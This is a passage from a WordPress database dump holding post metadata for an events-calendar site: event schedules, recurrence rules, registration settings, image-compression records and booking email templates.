:\"_RTECregistrationsDisabled\";i:1609084456;s:17:\"_RTECdeadlineType\";i:1609084456;s:19:\"_RTECwhoCanRegister\";i:1609084456;s:23:\"_RTEClimitRegistrations\";i:1609084456;s:21:\"_RTECmaxRegistrations\";i:1609084456;s:16:\"_EventRecurrence\";i:1609084456;s:18:\"_RTECnumRegistered\";i:1610274605;s:13:\"_EventVenueID\";i:1609084456;s:13:\"_thumbnail_id\";i:1609084456;s:16:\"tribe_events_cat\";i:1609186767;s:10:\"_edit_last\";i:1609085773;s:11:\"post_status\";i:1609085773;s:10:\"post_title\";i:1609085843;}'),(120392,263026,'_EventShowMap',''),(120400,263026,'_EventCost',''),(120401,263026,'_EventURL',''),(120402,263026,'_EventTimezone','America/Denver'),(120383,263026,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1609084456;s:12:\"_EventOrigin\";i:1609084456;s:24:\"boldgrid_hide_page_title\";i:1609084456;s:17:\"_EventShowMapLink\";i:1609084456;s:13:\"_EventShowMap\";i:1609084456;s:15:\"_EventStartDate\";i:1609085773;s:13:\"_EventEndDate\";i:1609085773;s:18:\"_EventStartDateUTC\";i:1609085773;s:16:\"_EventEndDateUTC\";i:1609085773;s:14:\"_EventDuration\";i:1609084456;s:20:\"_EventCurrencySymbol\";i:1609084456;s:22:\"_EventCurrencyPosition\";i:1609084456;s:10:\"_EventCost\";i:1609084456;s:9:\"_EventURL\";i:1609084456;s:14:\"_EventTimezone\";i:1609084456;s:18:\"_EventTimezoneAbbr\";i:1609084456;s:27:\"_EventNextPendingRecurrence\";i:1609084456;s:12:\"_dp_original\";i:1609084456;s:26:\"_RTECregistrationsDisabled\";i:1609084456;s:17:\"_RTECdeadlineType\";i:1609084456;s:19:\"_RTECwhoCanRegister\";i:1609084456;s:23:\"_RTEClimitRegistrations\";i:1609084456;s:21:\"_RTECmaxRegistrations\";i:1609084456;s:16:\"_EventRecurrence\";i:1609084456;s:18:\"_RTECnumRegistered\";i:1610274605;s:13:\"_EventVenueID\";i:1609084456;s:13:\"_thumbnail_id\";i:1609084456;s:16:\"tribe_events_cat\";i:1609186767;s:10:\"_edit_last\";i:1609085773;s:11:\"post_status\";i:1609085773;s:10:\"post_title\";i:1609085843;}'),(120391,263026,'_EventShowMapLink',''),(120403,263026,'_EventTimezoneAbbr','MST'),(120404,263026,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(120415,263026,'_dp_original','262070'),(120384,263026,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1609084456;s:12:\"_EventOrigin\";i:1609084456;s:24:\"boldgrid_hide_page_title\";i:1609084456;s:17:\"_EventShowMapLink\";i:1609084456;s:13:\"_EventShowMap\";i:1609084456;s:15:\"_EventStartDate\";i:1609085773;s:13:\"_EventEndDate\";i:1609085773;s:18:\"_EventStartDateUTC\";i:1609085773;s:16:\"_EventEndDateUTC\";i:1609085773;s:14:\"_EventDuration\";i:1609084456;s:20:\"_EventCurrencySymbol\";i:1609084456;s:22:\"_EventCurrencyPosition\";i:1609084456;s:10:\"_EventCost\";i:1609084456;s:9:\"_EventURL\";i:1609084456;s:14:\"_EventTimezone\";i:1609084456;s:18:\"_EventTimezoneAbbr\";i:1609084456;s:27:\"_EventNextPendingRecurrence\";i:1609084456;s:12:\"_dp_original\";i:1609084456;s:26:\"_RTECregistrationsDisabled\";i:1609084456;s:17:\"_RTECdeadlineType\";i:1609084456;s:19:\"_RTECwhoCanRegister\";i:1609084456;s:23:\"_RTEClimitRegistrations\";i:1609084456;s:21:\"_RTECmaxRegistrations\";i:1609084456;s:16:\"_EventRecurrence\";i:1609084456;s:18:\"_RTECnumRegistered\";i:1610274605;s:13:\"_EventVenueID\";i:1609084456;s:13:\"_thumbnail_id\";i:1609084456;s:16:\"tribe_events_cat\";i:1609186767;s:10:\"_edit_last\";i:1609085773;s:11:\"post_status\";i:1609085773;s:10:\"post_title\";i:1609085843;}'),(120386,263026,'_EventOrigin','events-calendar'),(120387,263026,'_EventOrigin','events-calendar'),(120388,263026,'_EventOrigin','events-calendar'),(120389,263026,'_EventOrigin','events-calendar'),(120390,263026,'boldgrid_hide_page_title','0'),(120395,263026,'_EventStartDateUTC','2021-01-10 17:30:00'),(120385,263026,'_EventOrigin','events-calendar'),(120406,263026,'_RTECregistrationsDisabled','0'),(120407,263026,'_RTECdeadlineType','start'),(120408,263026,'_RTECwhoCanRegister','any'),(120409,263026,'_RTEClimitRegistrations','0'),(120410,263026,'_RTECmaxRegistrations','30'),(120411,263026,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(120412,263026,'_RTECnumRegistered','2'),(120413,263026,'_EventVenueID','262305'),(120416,263026,'_edit_lock','1609186767:2'),(120417,263026,'_edit_last','2'),(121086,263203,'_RTECwhoCanRegister','any'),(121054,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121084,263203,'_RTECregistrationsDisabled','1'),(143952,265198,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(143950,265199,'_wp_attached_file','2021/06/hand-reaching-1.jpg'),(143949,265198,'_oembed_time_00fd25165c276be444f4c4e9b5803e0e','1624846932'),(143946,265198,'mec_display_cancellation_reason_in_single_page',''),(143947,265198,'_thumbnail_id','265199'),(143948,265198,'_oembed_00fd25165c276be444f4c4e9b5803e0e','<blockquote class=\"wp-embedded-content\" data-secret=\"3zcdAxBRGl\"><a href=\"https://www.eckankar.org/soul-adventure/\">ECK Soul Adventure</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;ECK Soul Adventure&#8221; &#8212; Eckankar\" src=\"https://www.eckankar.org/soul-adventure/embed/#?secret=3zcdAxBRGl\" data-secret=\"3zcdAxBRGl\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),(120780,263088,'protect_children',''),(120781,263088,'_edit_lock','1674583529:2'),(120782,263088,'_edit_last','2'),(143517,265134,'mec_bfixed_fields','a:0:{}'),(143516,265134,'mec_public','1'),(143515,265134,'mec_countdown_method','global'),(143514,265134,'mec_timezone','global'),(131877,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131899,263791,'_EventDuration','4500'),(131900,263791,'_EventCurrencySymbol',''),(131875,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131898,263791,'_EventEndDateUTC','2021-02-27 03:15:00'),(131901,263791,'_EventCurrencyPosition','prefix'),(131874,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131897,263791,'_EventStartDateUTC','2021-02-27 02:00:00'),(131876,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131896,263791,'_EventEndDate','2021-02-26 20:15:00'),(131902,263791,'_EventCost',''),(120811,263019,'smush-info','The file was compressed from 47.60 KB to 47.60 KB saving 0 percent using WP-Optimize'),(120813,263019,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:48739;s:12:\"smushed-size\";i:48739;s:15:\"savings-percent\";d:0;}'),(120812,263019,'smush-complete','1'),(120814,263107,'_wp_attached_file','2020/12/mountain-area-member-cal-promo.jpg'),(120815,263107,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:411;s:6:\"height\";i:231;s:4:\"file\";s:42:\"2020/12/mountain-area-member-cal-promo.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"mountain-area-member-cal-promo-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"mountain-area-member-cal-promo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(120816,263107,'_edit_lock','1609261927:2'),(120817,263107,'original-file','2020/12/mountain-area-member-cal-promo-updraft-pre-smush-original.jpg'),(120818,263107,'smush-info','The file was compressed from 46.91 KB to 43.26 KB saving 7.78 percent using WP-Optimize'),(120820,263107,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:48035;s:12:\"smushed-size\";i:44300;s:15:\"savings-percent\";d:7.78000000000000024868995751603506505489349365234375;}'),(120819,263107,'smush-complete','1'),(143506,265134,'mec_more_info',''),(143505,265134,'mec_read_more',''),(143503,265134,'_edit_last','2'),(143498,265134,'mec_reg_fields_global_inheritance','1'),(121091,263203,'_EventVenueID','262435'),(11357,128132,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-04-18\";s:14:\"EventStartDate\";s:19:\"2020-12-20 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 13:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117329,262891,'_RTEClimitRegistrations','0'),(117330,262891,'_RTECmaxRegistrations','30'),(11358,128132,'_EventShowMapLink','1'),(11359,128132,'_EventShowMap','1'),(11361,128132,'_EventStartDate','2020-12-20 11:30:00'),(11362,128132,'_EventEndDate','2020-12-20 13:00:00'),(11363,128132,'_EventStartDateUTC','2020-12-20 18:30:00'),(11364,128132,'_EventEndDateUTC','2020-12-20 20:00:00'),(11365,128132,'_EventDuration','5400'),(11366,128132,'_EventCurrencySymbol',''),(11367,128132,'_EventCurrencyPosition','prefix'),(116799,262873,'_EventDuration','4500'),(118898,262956,'_RTECmaxRegistrations','30'),(118889,262956,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118891,262956,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118890,262956,'protect_children',''),(117464,262896,'_EventShowMapLink','1'),(117465,262896,'_EventShowMap','1'),(117466,262896,'_EventVenueID','262507'),(117467,262896,'_EventCurrencySymbol',''),(117468,262896,'_EventCurrencyPosition','prefix'),(117453,262896,'protect_children',''),(117447,262896,'_EventStartDate','2021-02-11 19:00:00'),(117469,262896,'_EventCost',''),(117448,262896,'_EventStartDateUTC','2021-02-12 02:00:00'),(117449,262896,'_EventEndDate','2021-02-11 20:30:00'),(117470,262896,'_EventURL',''),(117450,262896,'_EventEndDateUTC','2021-02-12 03:30:00'),(117451,262896,'_EventDuration','5400'),(117452,262896,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117454,262896,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117457,262896,'_RTECregistrationsDisabled','1'),(117458,262896,'_RTECdeadlineType','start'),(117459,262896,'_RTECwhoCanRegister','any'),(117460,262896,'_RTEClimitRegistrations','0'),(117461,262896,'_RTECmaxRegistrations','30'),(117462,262896,'boldgrid_hide_page_title','0'),(117463,262896,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118886,262956,'_EventEndDate','2021-04-11 10:15:00'),(188297,268838,'mec_tickets','a:0:{}'),(188298,268838,'mec_fees_global_inheritance','1'),(188299,268838,'mec_fees','a:0:{}'),(188300,268838,'mec_ticket_variations_global_inheritance','1'),(188301,268838,'mec_ticket_variations','a:0:{}'),(188302,268838,'mec_reg_fields_global_inheritance','1'),(188303,268838,'mec_reg_fields','a:0:{}'),(188304,268838,'mec_bfixed_fields','a:0:{}'),(188305,268838,'mec_op','a:0:{}'),(188306,268838,'mec_fields','a:0:{}'),(188307,268838,'mec_event_status','EventScheduled'),(188308,268838,'mec_moved_online_link',''),(188309,268838,'mec_cancelled_reason',''),(188310,268838,'mec_display_cancellation_reason_in_single_page',''),(188311,268838,'boldgrid_hide_page_title','0'),(188312,268838,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(188313,268838,'passster_activate_global_protection',NULL),(188314,268838,'passster_activate_protection',NULL),(188315,268838,'passster_protection_type','password'),(188316,268838,'boldgrid_in_page_containers','1'),(95800,262102,'_wp_page_template','default'),(95801,262102,'passster_activate_protection',NULL),(95802,262102,'passster_protection_type','password'),(95803,262102,'boldgrid_hide_page_title','0'),(95804,262102,'boldgrid_in_page_containers','1'),(95805,262102,'bgseo_robots_index','index'),(95806,262102,'bgseo_robots_follow','follow'),(117354,262892,'_EventOrigin','events-calendar'),(117346,262892,'_EventStartDate','2021-10-10 12:15:00'),(117361,262892,'boldgrid_hide_page_title','0'),(117347,262892,'_EventStartDateUTC','2021-10-10 18:15:00'),(117348,262892,'_EventEndDate','2021-10-10 13:45:00'),(117362,262892,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117349,262892,'_EventEndDateUTC','2021-10-10 19:45:00'),(117350,262892,'_EventDuration','5400'),(117351,262892,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512444;s:16:\"protect_children\";i:1607512444;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117352,262892,'protect_children',''),(117353,262892,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512444;s:16:\"protect_children\";i:1607512444;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i: